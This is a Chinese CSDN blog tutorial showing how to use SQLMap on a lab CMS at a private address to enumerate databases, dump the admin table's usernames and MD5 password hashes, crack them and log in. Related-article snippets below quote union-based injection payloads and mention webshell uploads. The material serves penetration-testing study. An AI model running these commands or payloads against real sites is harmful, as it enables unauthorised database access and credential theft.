SQLMap获取cms 后台管理员账密

最新推荐文章于 2024-05-22 10:15:00 发布
最新推荐文章于 2024-05-22 10:15:00 发布
阅读量243 收藏
点赞数
文章标签: sql 数据库 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QYbkx974/article/details/134275002
版权

SQLMap获取cms 后台管理员账密

文章目录

前言

之前使用联合查询和报错注入获取了cms的后台管理员账密,这次使用SQLMap来获取

一、SQLMap是什么

SQLMap 是一款专注于sQLv 的工具,堪称神器。SQLmap 基于Python 语言编写的命令行工具,集成在KALI中。

二、使用步骤

1.sqlmap的更新与安装

1.kali 自带sqlmap安装

sudo apt-get update
sudo apt-get install sqlmap

2.源码包安装

git clone https://github.com/sqlmapproject/sqlmap.git
git fetch
git pull

2.参数说明

参数说明
-u检测注入点
- -dbs列出所有库名
- -current-user当前连接数据库用户的名字
- -current-db当前数据库的名字
-D “cms”指定目标数据库为cms
- -tables列出数据库中的所有表名
-T “cms_users”指定目标表名为"cms_users"
- -columns列出所有的字段名
-C “username,password”指定目标字段
- -dump列出字段内容
-r从文件中读取HTTP请求
- -os-shell特定情况下,可以直接获取目标系统shell
- -level 3设置sqlmap 检测等级3
- -cookie=“username=admin”携带Cookie信息进行注入
-g利用google搜索引擎自动搜索注入点
- -batch使用默认选项
- -random-agent使用随机User-Agent信息
-v 3显示payload

三、案例实现

使用此命令查询所有库名

┌──(kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" --dbs

在这里插入图片描述
使用此命令查询当前数据库的名字

kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" --current-db

在这里插入图片描述使用此命令查询cms数据库的所有表名

(kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" -D 'cms' --tables

在这里插入图片描述
使用此命令查询cms数据库下cms_users表中的所有字段

(kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" -D 'cms' -T 'cms_users' --columns

在这里插入图片描述
使用此命令查询cms数据库下cms_users表中的username,password的内容

(kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" -D 'cms' -T 'cms_users' -C 'username,password' --dump

在这里插入图片描述这里使用的加密方式是MD5加密,也可以使用kali中有自带的密码本破解

在这里插入图片描述
输入刚刚获取的账密登录验证

在这里插入图片描述成功
在这里插入图片描述

一十一丶青禾
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用sqlmap注入获取网址管理员
WINDY_PACE的博客
04-21 6508
sqlmap 靶场的攻击注入利用。
sql注入获取网站后台管理员号与
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
【安全】【SQL注入漏洞】通过sql注入获取数据库管理员
little_stupid_child的专栏
01-21 7712
本博客中使用封神台靶标系统进行演示,靶标系统网站。 一、判断网站是否存在sql注入漏洞 1.在地址栏写入?id=1 and 1=1,回车 页面返回正常。 2.在地址栏写入?id=1 and 1=2,回车 页面返回异常,这里可能存在sql注入漏洞。 二、判断字段数 1.在地址栏写入?id=1 and 1=1 order by 3 页面返回异常,表的字段数小于3 2.在地址栏写入?id=1 and 1=1 order by 2 页面返回正常,说明表的字段数为2。 三、获取回显点 在地址栏写入?id=1
SQL注入之sqlmap入门教程_sqlmap注入
最新发布
m0_61869253的博客
05-22 693
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
通过SQL注入拿到管理员
qq_52337463的博客
01-14 4159
该靶场来自于(封神台封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 首先我们看下题目 题目是通过SQL注入拿到管理员后台码 我们先点开"传送门"打开靶场 靶场已经打开了,我们先点"点击查看新闻"打开页面 看起来没啥有用的信息但是别慌,我们先进行SQL注入 在URL中***/?id=1 后面写命令进行注入 and 1=2 union select 1,concat(username,',',password) from admin 这里的admin...
通过SQL手工注入拿到管理员码--辛巴猫舍
ningmini的博客
05-20 1949
通过SQL手工注入拿到管理员码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
获取系统管理员码和号findpass
01-10
获取系统管理员码和号findpass
CentOS 7 通过SQLmap进行SQL注入
a790308的博客
08-05 759
安装SQLmap: IP:192.168.94.11 渗透测试演练系统DVWA: IP:192.168.94.111 通过SQLmap检测SQL注入漏洞 : 1.安装SQLmap漏洞查看工具 2.安装渗透测试演练系统DVWA 3.使用SQLmap进行sql注入并获得后台管理员adnim帐号和码 sql注入概述: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输...
Sqlmap获取用户名与服务器.docx
04-14
Sqlmap 是一款功能强大且功能多样的渗透测试工具,特别是在数据库安全测试方面。通过 Sqlmap,我们可以轻松地检测数据库系统的漏洞,从而获取数据库用户名和码。 Sqlmap 工具的使用非常广泛,特别是在渗透测试和...
74CMS 3.0 SQL注入漏洞后台.docx
07-07
该文件主要用于管理员登录,通过 $_REQUEST['act'] 获取 GET 或者 POST 传递过来的数据,并赋值给 act,然后对 act 的内容进行判断。 在 admin_login.php 文件中,我们可以看到以下代码: ```php if($act == '...
通过SQLmap爬数据库获取虚拟机架站的用户名和
07-13
通过SQLmap爬数据库获取虚拟机架站的用户名和
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap的工作原理是自动化地探测输入参数与SQL查询之间的关联,然后尝试执行各种注入技术,如盲注、时间延迟注入、union查询注入等,来获取数据库信息。 SQLmap的主要功能包括: 1. **检测SQL注入**:通过发送一...
基于phpcmssqlmap工具注入
qq_44060093的博客
08-20 566
SQL注入攻击是一种常用的攻击网站手段。受影响的网站系统: ASP+Access、ASP+SQLServer、PHP+MySQL、PHP+Apache等。 实验原理 SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。 SQLMAP支持五种SQL注入技术: (1)基于布尔值得注入,基于时间的盲注,基于错误的盲注,UNION查询和s
使用sqlmap检测sql注入漏洞
热门推荐
菜鸟、上路
08-21 10万+
一、 sql注入概述并安装sqlmap漏洞查看工具 1、 sql注入概述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库。 比如先前的很多影视网站泄露VIP会员码大多就是通过WEB表单递交查询字符暴出的,这类表...
sqlmap,扫描网站数据库并得到用户名及码!
专注前端技术,包括Web端、移动端、小程序、APP
02-04 9844
接着上篇文章,你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap,使用sqlmap对一个网站解剖分析! SqlMap的程序允许检查网站的SQL注入漏洞,XSS漏洞的存在,并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在漏洞。 如果该站点容易受到SQL注入的攻击,则骇客可以进行以下攻击: 从数据库接收信息,包括转储(整个)数...
SQLmap数据库注入攻击
The Road Of Sec
09-16 1240
指令: sqlmap -u url    扫描注入点扫描目标主机。(url前提是存在漏洞) sqlmap -u url  --users 获取到用户名 sqlmap -u url  --dbs 爆出该sqlserver中所有数据库名称 sqlmap -u url  --current -db  爆出当前web使用的数据库 sqlmap -u url  --current -u
Web安全 SQL注入 || 文件上传 的漏洞.(拿到服务器的最高权限.)
网络安全领域___专研者.
02-07 5189
本文章是DVWA靶场来模拟,所有答案均为个人想法.(有更好的答案可以评论.) 内容有:(1)SQL注入方式(sqlmap工具的利用)通过SQL注入漏洞一步步拿到管理员后台号和码.(2)寻找网站后台的登陆页面.(3)一句话木马的编写.(4)通过一句话木马连接服务器,并拿到服务器的权限.(5)文件上传技巧和绕过一些比较简单的限制.(6)随意下载和上传服务器的文件.(7)远程连接控制服务器.
实战SRC | 某站点后台管理系统SQL注入
zkaqlaoniao的博客
01-03 405
在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点。直接去百度一手,发现有个SQL注入还有其他的漏洞,打算一个一个尝试看看。所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.申明:本文所分享内容仅用于网络安全技术讨论,切勿用于违法途径,本文由掌控安全学院 - 会唱会跳会敲键盘 投稿。OK,成功爆破出数据库名,SQL注入一枚到手~网站后台很像cms搭建的,在查看网站时发现。典型的狮子鱼cms的特征!
sqlmap获取数据库
09-19
sqlmap 是一款常用于检测和利用数据库中的安全漏洞的工具,但是需要明确指出,对于未经授权的测试行为是不被允许的。以下仅为技术介绍,不鼓励非法行为。 要使用 sqlmap 获取数据库码,需要进行以下步骤: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值